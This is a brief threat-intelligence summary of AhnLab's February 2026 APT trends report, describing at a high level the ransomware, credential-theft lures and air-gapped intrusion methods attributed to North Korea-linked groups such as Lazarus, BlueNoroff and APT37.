AhnLab’s February 2026 APT trends report highlighted North Korea-linked activity involving Lazarus, BlueNoroff, UNC1069, and TA-RedAnt/APT37 alongside other global APT operations. The Lazarus section said the group used Medusa ransomware against U.S. healthcare organizations, a mental-health nonprofit, autism education facilities, U.S. private companies, and Middle East organizations, with tools including Comebacker, Blindingcan, ChromeStealer, Mimikatz, Infohook, curl, and RP_Proxy. The BlueNoroff-related Prospect Call activity used Telegram and Microsoft Teams lures to make macOS users run terminal commands, download payloads from a lookalike Teams domain, stage files with AppleScript, and copy Keychain databases for credential theft. TA-RedAnt/APT37 activity targeted air-gapped environments with LNK-based initial access, Zoho WorkDrive C2, Ruby droppers, and USB-based command delivery and data exfiltration, showing continued North Korean focus on financial gain, social engineering, credential theft, and segmented-network intrusion.